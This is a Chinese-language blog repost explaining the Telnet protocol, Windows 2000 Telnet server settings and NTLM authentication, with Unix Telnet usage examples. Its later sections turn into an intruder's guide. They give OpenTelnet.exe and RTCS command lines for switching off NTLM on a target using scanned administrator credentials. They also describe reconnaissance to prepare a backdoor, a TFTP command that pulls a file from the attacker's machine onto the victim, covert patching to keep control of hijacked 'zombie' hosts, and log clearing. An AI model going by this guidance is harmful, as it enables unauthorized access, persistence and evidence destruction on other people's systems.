1. 程式人生 > >遠端登入協議(TELNET)

遠端登入協議(TELNET)

地址:http://www.xxglx.com/net/zyk/htmlfiles/protocol/protocol00048.htm 

Telnet協議是TCP/IP協議族中的一員,是Internet遠端登陸服務的標準協議和主要方式。它為使用者提供了在本地計算機上完成遠端主機工作的能力。在終端使用者的電腦上使用telnet程式,用它連線到伺服器。終端使用者可以在telnet程式中輸入命令,這些命令會在伺服器上執行,就像直接在伺服器的控制檯上輸入一樣。可以在本地就能控制伺服器。要開始一個telnet會話,必須輸入使用者名稱和密碼來登入伺服器。Telnet是常用的遠端控制Web伺服器的方法 

  它最初是由ARPANET開發的,但是現在它主要用於Internet會話。它的基本功能是,允許使用者登入進入遠端主機系統。起初,它只是讓使用者的本地計算機與遠端計算機連線,從而成為遠端主機的一個終端。它的一些較新的版本在本地執行更多的處理,於是可以提供更好的響應,並且減少了通過鏈路傳送到遠端主機的資訊數量。

(一)遠端登入

  Telnet服務雖然也屬於客戶機/伺服器模型的服務,但它更大的意義在於實現了基於Telnet協議的遠端登入(遠端互動式計算),那麼就讓我們來認識一下遠端登入。 
1 遠端登陸的基本概念
  先來看看什麼叫登入:分時系統允許多個使用者同時使用一臺計算機,為了保證系統的安全和記賬方便,系統要求每個使用者有單獨的帳號作為登入標識,系統還為每個使用者指定了一個口令。使用者在使用該系統之前要輸入標識和口令,這個過程被稱為'登入'。 
  遠端登陸是指使用者使用Telnet命令,使自己的計算機暫時成為遠端主機的一個模擬終端的過程。模擬終端等效於一個非智慧的機器,它只負責把使用者輸入的每個字元傳遞給主機,再將主機輸出的每個資訊回顯在螢幕上。 

2 遠端登陸的產生及發展
  我們可以先構想一個提供遠端文字編輯的服務,這個服務的實現需要一個接受編輯檔案請求和資料的伺服器以及一個傳送此請求的客戶機。客戶機將建立一個從本地機到伺服器的TCP連線,當然這需要伺服器的應答,然後向伺服器傳送鍵入的資訊(檔案編輯資訊),並讀取從伺服器返回的輸出。以上便是一個標準而普通的客戶機/伺服器模型的服務。 
  似乎有了客戶機/伺服器模型的服務,一切遠端問題都可以解決了。然而實際並非你想象的那樣簡單,如果我們僅需要遠端編輯檔案,那麼剛才所構想的服務完全可以勝任,但假如我們的要求並不是這麼簡單,我們還想實現遠端使用者管理,遠端資料錄入,遠端系統維護,想實現一切可以在遠端主機上實現的操作,那麼我們將需要大量專用的伺服器程式併為每一個可計算服務都使用一個伺服器程序,隨之而來的問題是:遠端機器會很快對伺服器程序應接不暇,並淹沒在程序的海洋裡(我們在這裡排除最專業化的遠端機器)。 

  那麼有沒有辦法解決呢?當然有,我們可以用遠端登入來解決這一切。我們允許使用者在遠地機器上建立一個登入會話,然後通過執行命令來實現更一般的服務,就像在本地操作一樣。這樣,我們便可以訪問遠地系統上所有可用的命令,並且系統設計員不需提供多個專用地伺服器程式。 
  問題發展到這裡好像前途一片光明瞭,用遠端登入總應該解決問題了吧,但要實現遠端登陸並不簡單。不考慮網路設計的計算機系統期望使用者只從直接相連的鍵盤和顯示器上登入,在這種機器上增加遠端登陸功能需要修改機器的作業系統,這是極其艱鉅也是我們儘量避免的。因此我們應該集中力量構造遠端登陸伺服器軟體,雖然這樣也是比較困難的。為什麼說這樣做也比較困難呢? 
  舉個例子來說:一般,作業系統會為一些特殊按鍵分配特殊的含義,比如本地系統將'Ctrl+C'解釋為:'終止當前執行的命令程序'。但假設我們已經運行了遠端登陸伺服器軟體,'Ctrl+C'也有可能無法被傳送到遠地機器,如果客戶機真的將'Ctrl+C'傳到了遠地機器,那麼'Ctrl+C'這個命令有可能不能終止本地的程序,也就是說在這裡很可能會產生混亂。而且這僅僅是遇到的難題之一。 
  但儘管有技術上的困難,系統程式設計人員還是設法構造了能夠應用於大多數作業系統的遠端登陸伺服器軟體,並構造了充當客戶機的應用軟體。通常,客戶機軟體取消了除一個鍵以外的所有鍵的本地解釋,並將這些本地解釋相應的轉換成遠地解釋,這就使得客戶機軟體與遠地機器的互動,就如同坐在遠端主機面前一樣,從而避免了上述所提到的混亂。而那個唯一例外的鍵,可以使使用者回到本地環境。 
  將遠端登陸伺服器設計為應用級軟體,還有另一個要求,那就是需要作業系統提供對偽終端(pseudo terminal)的支援。我們用偽終端描述作業系統的入口點,它允許像Telnet伺服器一樣的程式向作業系統傳送字元,並且使得字元像是來自本地鍵盤一樣。只有使用這樣的作業系統,才能將遠端登陸伺服器設計為應用級軟體(比如Telnet伺服器軟體),否則,本地作業系統和遠地系統傳送將不能識別從對方傳送過來的資訊(因為它們僅能識別從本地鍵盤所鍵入的資訊),遠端登陸將宣告失敗。 
  將遠端登陸伺服器設計為應用級軟體雖然有其顯著的優點:比將程式碼嵌入作業系統更易修改和控制伺服器。但其也有效率不高的缺點(後面的內容將會給予解釋),好在使用者鍵入資訊的速率不高,這種設計還是可以接受的。 
3 遠端登入的工作過程
  使用Telnet協議進行遠端登陸時需要滿足以下條件:在本的計算機上必須裝有包含Telnet協議的客戶程式;必須知道遠端主機的Ip地址或域名;必須知道登入標識與口令。 
  Telnet遠端登入服務分為以下4個過程: 
  1)本地與遠端主機建立連線。該過程實際上是建立一個TCP連線,使用者必須知道遠端主機的Ip地址或域名; 
  2)將本地終端上輸入的使用者名稱和口令及以後輸入的任何命令或字元以NVT(Net Virtual Terminal)格式傳送到遠端主機。該過程實際上是從本地主機向遠端主機發送一個IP資料包; 
  3)將遠端主機輸出的NVT格式的資料轉化為本地所接受的格式送回本地終端,包括輸入命令回顯和命令執行結果; 
  4)最後,本地終端對遠端主機進行撤消連線。該過程是撤銷一個TCP連線。 
  上面的內容只是討論了遠端登陸最基本的東西,其中的複雜和程式設計人員的艱辛是我們難以想象的,不知道你在舒服的使用Telnet的同時,是否想到了這些!

(二)Telnet協議

  我們知道Telnet伺服器軟體是我們最常用的遠端登入伺服器軟體,是一種典型的客戶機/伺服器模型的服務,它應用Telnet協議來工作。那麼,什麼是Telnet協議?它都具備哪些特點呢? 
1 基本內容
  Telnet協議是TCP/IP協議族中的一員,是Internet遠端登陸服務的標準協議。應用Telnet協議能夠把本地使用者所使用的計算機變成遠端主機系統的一個終端。它提供了三種基本服務: 
  1)Telnet定義一個網路虛擬終端為遠的系統提供一個標準介面。客戶機程式不必詳細瞭解遠的系統,他們只需構造使用標準介面的程式; 
  2)Telnet包括一個允許客戶機和伺服器協商選項的機制,而且它還提供一組標準選項; 
  3)Telnet對稱處理連線的兩端,即Telnet不強迫客戶機從鍵盤輸入,也不強迫客戶機在螢幕上顯示輸出。 
2 適應異構
  為了使多個作業系統間的Telnet互動操作成為可能,就必須詳細瞭解異構計算機和作業系統。比如,一些作業系統需要每行文字用ASCII回車控制符(CR)結束,另一些系統則需要使用ASCII換行符(LF),還有一些系統需要用兩個字元的序列回車-換行(CR-LF);再比如,大多數作業系統為使用者提供了一箇中斷程式執行的快捷鍵,但這個快捷鍵在各個系統中有可能不同(一些系統使用CTRL+C,而另一些系統使用ESCAPE)。如果不考慮系統間的異構性,那麼在本地發出的字元或命令,傳送到遠地並被遠地系統解釋後很可能會不準確或者出現錯誤。因此,Telnet協議必須解決這個問題。 
  為了適應異構環境,Telnet協議定義了資料和命令在Internet上的傳輸方式,此定義被稱作網路虛擬終端NVT(Net Virtual Terminal)。它的應用過程如下: 
  對於傳送的資料:客戶機軟體把來自使用者終端的按鍵和命令序列轉換為NVT格式,併發送到伺服器,伺服器軟體將收到的資料和命令,從NVT格式轉換為遠地系統需要的格式; 
  對於返回的資料:遠地伺服器將資料從遠地機器的格式轉換為NVT格式,而本地客戶機將將接收到的NVT格式資料再轉換為本地的格式。 
  對於NVT格式的詳細定義,有興趣的朋友可以去查詢相關資料。 
3 傳送遠地命令
  我們知道絕大多數作業系統都提供各種快捷鍵來實現相應的控制命令,當用戶在本地終端鍵入這些快捷鍵的時候,本地系統將執行相應的控制命令,而不把這些快捷鍵作為輸入。那麼對於Telnet來說,它是用什麼來實現控制命令的遠地傳送呢? 
  Telnet同樣使用NVT來定義如何從客戶機將控制功能傳送到伺服器。我們知道USASCII字符集包括95個可列印字元和33個控制碼。當用戶從本地鍵入普通字元時,NVT將按照其原始含義傳送;當用戶鍵入快捷鍵(組合鍵)時,NVT將把它轉化為特殊的ASCII字元在網路上傳送,並在其到達遠地機器後轉化為相應的控制命令。將正常ASCII字符集與控制命令區分主要有兩個原因: 
  1)這種區分意味著Telnet具有更大的靈活性:它可在客戶機與伺服器間傳送所有可能的ASCII字元以及所有控制功能; 
  2)這種區分使得客戶機可以無二義性的指定信令,而不會產生控制功能與普通字元的混亂。 
4 資料流向
  上面我們提到過將Telnet設計為應用級軟體有一個缺點,那就是:效率不高。這是為什麼呢?下面給出Telnet中的資料流向: 
  資料資訊被使用者從本地鍵盤鍵入並通過作業系統傳到客戶機程式,客戶機程式將其處理後返回作業系統,並由作業系統經過網路傳送到遠地機器,遠地作業系統將所接收資料傳給伺服器程式,並經伺服器程式再次處理後返回到作業系統上的偽終端入口點,最後,遠地作業系統將資料傳送到使用者正在執行的應用程式,這便是一次完整的輸入過程;輸出將按照同一通路從伺服器傳送到客戶機。 
  因為每一次的輸入和輸出,計算機將切換程序環境好幾次,這個開銷是很昂貴的。還好使用者的鍵入速率並不算高,這個缺點我們仍然能夠接受。 
5 強制命令
  我們應該考慮到這樣一種情況:假設本地使用者運行了遠地機器的一個無休止迴圈的錯誤命令或程式,且此命令或程式已經停止讀取輸入,那麼作業系統的緩衝區可能因此而被佔滿,如果這樣,遠地伺服器也無法再將資料寫入偽終端,並且最終導致停止從TCP連線讀取資料,TCP連線的緩衝區最終也會被佔滿,從而導致阻止資料流流入此連線。如果以上事情真的發生了,那麼本地使用者將失去對遠地機器的控制。 
  為了解決此問題,Telnet協議必須使用外帶信令以便強制伺服器讀取一個控制命令。我們知道TCP用緊急資料機制實現外帶資料信令,那麼Telnet只要再附加一個被稱為資料標記(date mark)的保留八位組,並通過讓TCP傳送已設定緊急資料位元的報文段通知伺服器便可以了,攜帶緊急資料的報文段將繞過流量控制直接到達伺服器。作為對緊急信令的相應,伺服器將讀取並拋棄所有資料,直到找到了一個數據標記。伺服器在遇到了資料標記後將返回正常的處理過程。 
6 選項協商
  由於Telnet兩端的機器和作業系統的異構性,使得Telnet不可能也不應該嚴格規定每一個telnet連線的詳細配置,否則將大大影響Telnet的適應異構性。因此,Telnet採用選項協商機制來解決這一問題。 
  Telnet選項的範圍很廣:一些選項擴充了大方向的功能,而一些選項制涉及一些微小細節。例如:有一個選項可以控制Telnet是在半雙工還是全雙工模式下工作(大方向);還有一個選項允許遠地機器上的伺服器決定使用者終端型別(小細節)。 
  Telnet選項的協商方式也很有意思,它對於每個選項的處理都是對稱的,即任何一端都可以發出協商申請;任何一端都可以接受或拒絕這個申請。另外,如果一端試圖協商另一端不瞭解的選項,接受請求的一端可簡單的拒絕協商。因此,有可能將更新,更復雜的Telnet客戶機伺服器版本與較老的,不太複雜的版本進行互動操作。如果客戶機和伺服器都理解新的選項,可能會對互動有所改善。否則,它們將一起轉到效率較低但可工作的方式下執行。所有的這些設計,都是為了增強適應異構性,可見Telnet的適應異構性對其的應用和發展是多麼重要。 
  上面討論了一些原理方面的東西,雖然我們在Telnet的使用過程中很難接觸到這一層面,但我認為了解這些是有意義的,它會給我們帶來許多啟示。下面讓我們來看看Win2000的Telnet服務。

(三)Win2000的Telnet服務

  其實從應用層面上,Win2000的Telnet服務並沒有什麼可說的,絕大部分內容你都可以從HELP檔案中得到,我在此只是把它稍微整理一下而已。 
1 基本配置
  Win2000為我們提供了Telnet客戶機和伺服器程式:Telnet.exe是客戶機程式(Client),tlntsvr.exe是伺服器程式(server),同時它還為我們提供了Telnet伺服器管理程式tlntadmn.exe。 
  Windows 2000 預設安裝了 Telnet 服務,但是並沒有預設啟動。下面給出HELP檔案中 Telnet 服務的一部分預設設定: 
  AllowTrustedDomain:是否允許域使用者訪問。預設值是1,允許信任域使用者訪問。可以改為0: 不允許域使用者訪問(只允許本地使用者)。 
  DefaultDomain:可以對與該計算機具有信任關係的任何域設定。預設值是"."。 
  DefaultShell:顯示 shell 安裝的路徑位置。預設值是: %systemroot%\System32\Cmd.exe /q /k 
  MaxFailedLogins:在連線終止之前顯示嘗試登入失敗的最大次數。預設是3。 
  LoginScript:顯示 Telnet 伺服器登入指令碼的路徑位置。預設的位置就是“%systemroot%\System32\login.cmd”,你可以更改指令碼內容,這樣登入進Telnet的歡迎螢幕就不一樣了。 
  NTLM:NTLM身份驗證選項。預設是2。可以有下面這些值: 
  0: 不使用 NTLM 身份驗證。 
  1: 先嚐試 NTLM 身份驗證,如果失敗,再使用使用者名稱和密碼。 
  2: 只使用 NTLM 身份驗證。 
  TelnetPort:顯示 telnet 伺服器偵聽 telnet 請求的埠。預設是:23。你也可以更改為其他埠。 
  以上各項設定你可以使用tlntadmn.exe(Telnet伺服器管理程式)來進行非常方便的配置,配置後需要重新啟動Telnet服務。如圖1 
2 NTLM
  提到了telnet就不能不提NTLM,我想這也是讓入侵者最為頭痛的一件事,哪怕你獲得了管理員帳號和密碼,想簡單通過NTLM也並非易事,況且win2000中的telnet預設僅以NTLM方式驗證身份,這就讓我們不得不關注NTLM這個東東,那麼什麼是NTLM呢? 
  早期的SMB協議在網路上明文傳輸口令,後來出現了"LAN Manager Challenge/Response"驗證機制,簡稱LM,它十分簡單以至很容易被破解,微軟隨後提出了WindowsNT挑戰/響應驗證機制,即NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。NTLM工作流程是這樣的: 
  1、客戶端首先在本地加密當前使用者的密碼成為密碼雜湊 
  2、客戶端向伺服器傳送自己的帳號,這個帳號是沒有經過加密的,明文直接傳輸 
  3、伺服器產生一個16位的隨機數字傳送給客戶端,作為一個 challenge(挑戰) 
  4、客戶端再用加密後的密碼雜湊來加密這個 challenge ,然後把這個返回給伺服器。作為 response(響應) 
  5、伺服器把使用者名稱、給客戶端的challenge 、客戶端返回的 response 這三個東西,傳送域控制器 
  6、域控制器用這個使用者名稱在 SAM密碼管理庫中找到這個使用者的密碼雜湊,然後使用這個密碼雜湊來加密 challenge。 
  7、域控制器比較兩次加密的 challenge ,如果一樣,那麼認證成功。 
  從上面的過程我們可以看出,NTLM是以當前使用者的身份向Telnet伺服器傳送登入請求的,而不是用你掃到的對方管理員的帳戶和密碼登入,顯然,你的登入將會失敗。舉個例子來說,你家的機器名為A(本地機器),你入侵的機器名為B(遠地機器),你在A上的帳戶是xinxin,密碼是1234,你掃到B的管理員帳號是Administrator,密碼是5678,當你想Telnet到B時,NTLM將自動以當前使用者的帳號和密碼作為登入的憑據來進行上面的7項操作,即用xinxin和1234,而並非用你掃到的Administrator和5678,且這些都是自動完成的,根本不給你插手的機會,因此你的登入操作將失敗。 
  由於Telnet伺服器對NTLM的使用有3個選項,所以當你Telnet遠地機器時,會顯示下面情況中的一種: 
  1)身份驗證選項=0時 
  ===================================== 
  Microsoft (R) Windows (TM) Version 5.00 (Build 2195) 
  Welcome to Microsoft Telnet Service 
  Telnet Server Build 5.00.99201.1 
  login: 
  password: 
  \為0時不使用NTML身份驗證,直接輸入使用者名稱和密碼,比如你可以輸入掃到的Administrator和5678 
  2)身份驗證選項=1時 
  ===================================== 
  NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password 
  Microsoft (R) Windows (TM) Version 5.00 (Build 2195) 
  Welcome to Microsoft Telnet Service 
  Telnet Server Build 5.00.99201.1 
  login: 
  password: 
  \先嚐試 NTLM 身份驗證,如果失敗,再使用使用者名稱和密碼,其實這種方式對於我們來說,與上一種方式沒什麼區別 
  3)身份驗證選項=2時 
  ===================================== 
  NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password 
  Server allows NTLM authentication only 
  Server has closed connection 
  遺失對主機的連線。 
  C:\> 
  \仔細看看上面的顯示,根本沒有給你輸入使用者名稱和密碼的機會,直接斷開連線,掃到了密碼也是白掃 
  所以對於入侵者來說,NTLM是橫在我們面前的一座大山,必須要除掉它,一般我們有如下幾種方法: 
  (1) 通過修改遠端登錄檔更改telnet伺服器配置,將驗證方式從2改為1或0; 
  (2) 使用NTLM.exe,上傳後直接執行,可將telnet伺服器驗證方式從2改為1; 
  (3) 在本地建立掃描到的使用者,以此使用者身份開啟telnet客戶機並進行遠端登入; 
  (4) 使用軟體,比如opentelnet.exe(需要管理員許可權且開啟IPC管道) 
  (5) 使用指令碼,如RTCS,(需要管理員許可權但不依賴IPC管道) 
  基本上是以上的5種,其中後兩種是我們比較常用的開telnet的手法,而且使用方法十分簡單,命令如下: 
  OpenTelnet.exe \server username password NTLMAuthor telnetport 
  OpenTelnet.exe \伺服器地址 管理員使用者名稱 密碼 驗證方式(填0或1) telnet埠 
  cscript RTCS.vbe targetIP username password NTLMAuthor telnetport 
  cscript RTCS.vbe <目標IP> <管理員使用者名稱> <密碼> <驗證方式>

(四)在telnet中該做什麼

  1 檢視系統資訊 
  呵呵,其實就是隨處看看,看看他的系統配置和版本(用type c:\boot.ini來知道pro版或server版),看看都裝了什麼服務或軟體(從目錄名就可以知道了),看看有什麼重要或有趣的檔案啦(唉,要是國外的機器,看也看不懂),看看他的使用者情況,總之就是儘可能多的瞭解系統,為一會裝後門摸底。 
  2 使用tftp傳送檔案 
  想必大家都遇到過在telnet中傳輸檔案的問題,因為我們習慣了在ipc管道中的檔案傳輸,所以有些朋友喜歡用net share ipc$ 來開啟管道,進而利用copy來傳輸檔案。不過這樣反而麻煩,既然我們已經得到了shell,我們可以用TFTP命令來完成這一切,什麼是TFTP呢? 
  用TFTP(Trivial File Transfer Protocol)來實現檔案的傳送是一種基於UDP連線的檔案傳輸,一般是使用Windows自帶的tftp.exe和一個TFTP伺服器端軟體構成一個完整的傳輸結構。它是這樣使用的: 首先執行本地的TFTP Server(比如tftpd32.exe)軟體並保證始終開啟直至傳輸全部完成, 然後在telnet中(當然你也可以在其他shell中)執行下面的命令: 
  C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe 
  其中ip為你自己機器的ip,且上傳檔案要與TFTP伺服器端在同一目錄下,這樣你就可以把xinxin.exe上傳到c盤abc目錄下了(其實是從tftp伺服器下載來的) 
  需要指出的是,如果使用代理IP,你將不能實現與外部網路的檔案傳送。因為你的代理閘道器在進行資料封裝的時候會將自己的IP地址加入到你的資料報中,代替你的內部網路地址,所以在外部網路進行MAC定址時是找不到你這臺TFTP伺服器的。 
  3 打補丁 
  如果想獨霸肉雞,就要會打補丁,要知道對肉雞的競爭是很激烈的。怎麼打補丁呢?這個也要問?想想你是怎麼進來的吧。算了,提示一下,除了修補大的漏洞以外(上傳官方補丁並執行),也要注意它的共享,ipc$共享(最好都關閉),可疑埠,容易被利用的服務等。不過打補丁也要注意隱蔽性的,不要讓管理員發現大的改動。 
  4 清除日誌 
  可以手動或利用軟體,如果不太會就去找相關教材吧,在這裡我不詳細介紹了。 
  ====================================================================== 
  ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
  ====================================================================== 
  Telnet用於Internet的遠端登入.它可以使使用者坐在已上網的電腦鍵盤前通過網路進入的另一臺電腦已上網的電腦,使它們互相連通.這種連通可以發生在同一房間裡面的電腦或是在世界各範圍內已上網的電腦.習慣上來說,被連通計算機,並且為網路上所有使用者提供服務的計算機稱之為伺服器(Server),而自己在使用的機器稱之為客戶機(Client).一旦連通後,客戶機可以享有伺服器所提供的一切服務.使用者可以執行通常的互動過程(註冊進入,執行命令),也可以進入很多的特殊的伺服器如尋找圖書索引.網上不同的主機提供的各種服務都可以被使用. 
  Telnet 
  (telnet) (n.) A terminal emulation program for TCP/IP networks such as the Internet. The Telnet program runs on your computer and connects your PC to a server on the network. You can then enter commands through the Telnet program and they will be executed as if you were entering them directly on the server console. This enables you to control the server and communicate with other servers on the network. To start a Telnet session, you must log in to a server by entering a valid username and password. Telnet is a common way to remotely control Web servers.

(五)Telnet命令

  Telnet用於Internet的遠端登入.它可以使使用者坐在已上網的電腦鍵盤前通過網路進入的另一臺電腦已上網的電腦,使它們互相連通.這種連通可以發生在同一房間裡面的電腦或是在世界各範圍內已上網的電腦.習慣上來說,被連通計算機,並且為網路上所有使用者提供服務的計算機稱之為伺服器(Server),而自己在使用的機器稱之為客戶機(Client).一旦連通後,客戶機可以享有伺服器所提供的一切服務.使用者可以執行通常的互動過程(註冊進入,執行命令),也可以進入很多的特殊的伺服器如尋找圖書索引.網上不同的主機提供的各種服務都可以被使用. 
  使用Telnet的最簡單的方法是在命令列鍵入: 
  %telnet remote-computer-name(or IP) 
  這裡使用的是UNIX系統的C shell,因為命令的選擇是百分號"%".如果使用的是其他的計算機系統(比如:Dos,VAX/VMS,Macintosh)命令,只在細節上有些差異,而在本質上是大同小異的,下面舉一個基本的Telnet使用例子: 
  telnet porky.math.ukans.edu 
  Trying 129.237.128.11... 
  Connected to porky.math.ukans.edu. 
  Escape character is '^]'. 
  SunOS UNIX(porky) 
  login:wl 
  password:xxxxxxx 
  Last Login: Tue Mar 28 05:35 from ns.bta.net.cn 
  SunOS Release 4.1.3_U1(SLIPPERY1) #3: Sun Nov 20 23:47:23 CST 1999 
  No match. 
  if:Expression syntax. 
  porky/serv/wl%ls 
  hello 
  porky/serv/wl% 
  porky/serv/wl%cd/ 
  porky/%ls 
  Mail/ dev/ home/ mnt/ sbin/ 
  usr/ 
  News/ domain/ home1/ net/ serv/ 
  var/ 
  Record/ etc/ kadb* pcfs/ [email protected] 
  vmunix* 
  [email protected] export/ [email protected] print tmp/ 
  boot gofer/ lost+found/ record tmp_mnt/ 
  porky/% 
  上述的例子是用Telnet尋找一個叫做porky.math.ukans.edu的遠端計算機.在找到這臺計算機以後,已上網的使用者的計算機就成為它的一個終端.這時螢幕出現的對話與使用者在host上連線的終端一樣。使用者必須註冊進入(login)和登出推出(logout).在login後,可給出任何適合遠端系統的命令,因為"porky.math.ukans.edu"面向的是UNIX系統,所有標準的UNIX命令(想ls和pwd)都可以使用.當用戶從遠端系統退出時,也就從Telnet退出,便可以執行自己的本地系統.實際上,Telnet是一個可以註冊進入遠端計算機系統的工具.

(六)Telnet常用命令

  help 聯機求助 
  open後接IP地址或域名 即可進行遠端登入 
  close 正常結束遠端會話,回到命令方式 
  display 顯示工作引數 
  mode 進入行命令或字元方式 
  send 向遠端主機傳送特殊字元(鍵入send?可顯示詳細字元) 
  set 設定工作引數(鍵入set?可顯示詳細引數) 
  status 顯示狀態資訊 
  toggle 改變工作引數(鍵入toggle?可顯示詳細引數) 
  ^]換碼符(escape character), [1][2][3]在異常情況下退出會話,回到命令方式 
  quit退出telnet,返回本地機 
  z使telnet進入暫停狀態 
  結束命令方式,返回telnet的會話方式。 

相關推薦

遠端登入協議TELNET

地址:http://www.xxglx.com/net/zyk/htmlfiles/protocol/protocol00048.htm  Telnet協議是TCP/IP協議族中的一員,是Internet遠端登陸服務的標準協議和主要方式。它為使用者提供了在本地計算機上完成遠

用ssh遠端登入Linuxubuntu

一般流程,如果有問題,按照下面步驟排查一遍即可 檢視ssh是否開啟 service ssh status service ssh start service ssh restart service ssh stop 如果沒有安裝 sudo apt-get install

telnet 遠端登入指令碼免使用者名稱和麵膜手動輸入

介紹Xp上的指令碼,linux的各位看管自己琢磨。 建立一個telnet.vbs指令碼檔案: set sh=WScript.CreateObject("WScript.Shell")  WScript.Sleep 1000  sh.SendKeys "c:{ENTER}

Telnet協議1

Telnet網路的使用 概述:在internet的初期,遠端訪問計算機是一個非常麻煩的過程,需要修改提出請求的計算機的作業系統。同樣,因為網路可能存在的異構性,不能確保在一臺計算機上鍵入的內容可以不發生改變的在其他的計算機上被翻譯出來。例如,在本地計算機上同時按下Ctrl和D鍵,代表關閉一個會話

遠端登入mysql 關於授權

直接授權(推薦)  從任何主機上使用root使用者,密碼:youpassword(你的root密碼)連線到mysql伺服器: # mysql -u root -proot mysql>GRAN

關於遠端登入協議(Telnet,Rlogin,ssh)

 1)  Telnet(Telecommunication Network Protocol) Telnet是通過客戶端與伺服器之間的選項協商機制,實現了提供特定功能的雙方通訊。 如下圖所示,telnet客戶程序同時與終端驅動,TCP/IP協議模組進行互動,負責資訊的傳

TCP/IP協議2:網絡設備

數據包 服務器 網絡設備 風暴 二層交換機 不同的 中繼器 tcp/ip 解決 1、中繼器(Repeater) 中繼器工作在OSI的一層,我們知道,超5類線的傳輸距離最大為100米,超過這個距離信號就會衰減,中繼器就是為了防止信號變差,將網絡信號進行再生和重定時。 2、

HTTP協議——了解Web及網絡基礎

協議 http web 一、使用HTTP協議訪問Web Web頁面不會憑空顯示出來,根據Web瀏覽器地址欄中指定的URL,Web瀏覽器從Web服務器獲取文件資源等信息,從而顯示出Web頁面。 像這種通過發送請求獲取服務器資源的Web瀏覽器等,都可稱為客戶端。本文出自 “IT菜鳥” 博客

[圖解]ARP協議

tcp/ip arp協議 一、ARP概述如果要在TCP/IP協議棧中選擇一個"最不安全的協議",那麽我會毫不猶豫把票投給ARP協議。我們經常聽到的這些術語,包括"網絡掃描"、"內網滲透"、"中間人攔截"、"局域網流控"、"流量欺騙",基本都跟ARP脫不了幹系。大量的安全工具,例如大名鼎鼎的Cain、功

圖解ARP協議ARP攻擊原理與實踐

tcp/ip arp協議 網絡安全 局域網安全 一、ARP攻擊概述在上篇文章裏,我給大家普及了ARP協議的基本原理,包括ARP請求應答、數據包結構以及協議分層標準,今天我們繼續討論大家最感興趣的話題:ARP攻擊原理是什麽?通過ARP攻擊可以做什麽,賬號是否可以被竊取?有哪些常見的ARP滲透(攻

圖解ARP協議ARP防禦篇-如何揪出"內鬼"並"優雅的還手"

負責任 text 介紹 成功 過濾器 現在 導致 打開 是個 一、ARP防禦概述 通過之前的文章,我們已經了解了ARP攻擊的危害,黑客采用ARP軟件進行掃描並發送欺騙應答,同處一個局域網的普通用戶就可能遭受斷網攻擊、流量被限、賬號被竊的危險。由於攻擊門檻非常低,普通人只要拿

專利:結構化大數據通信協議2

結構化大數據通信協議說明2:數據的唯一性是實現“數據全球通”的基礎在班、組這樣的小環境中可以用每個人的姓名而區分出每一個人,然而在全國範圍內,由於人數太多,重名的很多,因此僅靠姓名就不能準確無誤地識別出每一個人。大數據時代以前的關系數據庫中的數據只是應用於某個機構內部,因此各個數據就容易識別,然而如果把關系數

關於HTTP協議

java類 post方法 -a wow 配置 即使 關閉 客戶端瀏覽器 實體 HTTP簡介 HTTP協議是Hyper Text Transfer Protocol(超文本傳輸協議)的縮寫,是用於從萬維網(WWW:World Wide Web )服務器傳輸超文本到本地瀏覽

HTTP協議:介紹

ans html 通過 www. cat hyper res lan 了解 HTTP協議(一):介紹 RFC 2616定義了今天普遍使用的一個版本——HTTP 1.1。HTTP協議(HyperText Transfer Protocol,超文本傳輸協議)

通信協議之Modbus協議

簡介 方法 電子 相互 dbus 通信 兼容 校驗位 行集 Modbus通信協議: 簡介:Modbus協議是應用於電子控制器上的一種通用語言 通過此協議,控制器相互之間,控制器經由網絡(例如以太網) 和其他設備之間可以通信,他已經成為一種通用工業標準,有啦它 不同廠商生產的

熱備份路由選擇協議HSRP配置命令及原理

ndb vrrp 恢復 命令 time conf eem 路由協議 調整 熱備份路由選擇協議(HSRP)HSRP是Cisco私有協議HSRP組成員:(1)活躍路由器(2)備份路由器(3)虛擬路由器(4)其他路由器HSRP消息:HSRP中的所有路由器都發送或接收HSRP消息U

七LWIP學習筆記之傳輸控制協議TCP

輸入 post wait syn 快速重傳 擁塞 斷開連接 其他 time 一、協議簡介 1、TCP的必要性 2、TCP的特性 3、連接的定義 4、數據流編號 5、滑動窗口 二、TCP報文 1、報文格式 2、TCP選項 3、緊急數據 4、強迫數據交互 5、報文首部數據結構

六LWIP學習筆記之用戶數據報協議UDP

端口 數據結構 筆記 udp協議 pos body 校驗 傳輸 連接 一、背景知識 1、傳輸層協議 2、UDP協議 3、端口 4、UDP報文的交付 5、UDP報文格式 6、UDP偽首部與校驗和 二、UDP數據結構 1、報文首部結構 2、控制塊 三、控制塊操作函數 1、使用U

地址解析協議ARP

1.3 開始 linu 網絡 報文結構 自己的 不可 分析 png 地址解析協議(ARP) 1.作用 為什麽主機需要有各自的ipv4地址和mac地址才能通信呢? ip屬於網絡層,mac地址屬於數據鏈路層。通過沿ip傳輸的路徑是邏輯路徑,由路由設備根據路由表進行轉發,而一條邏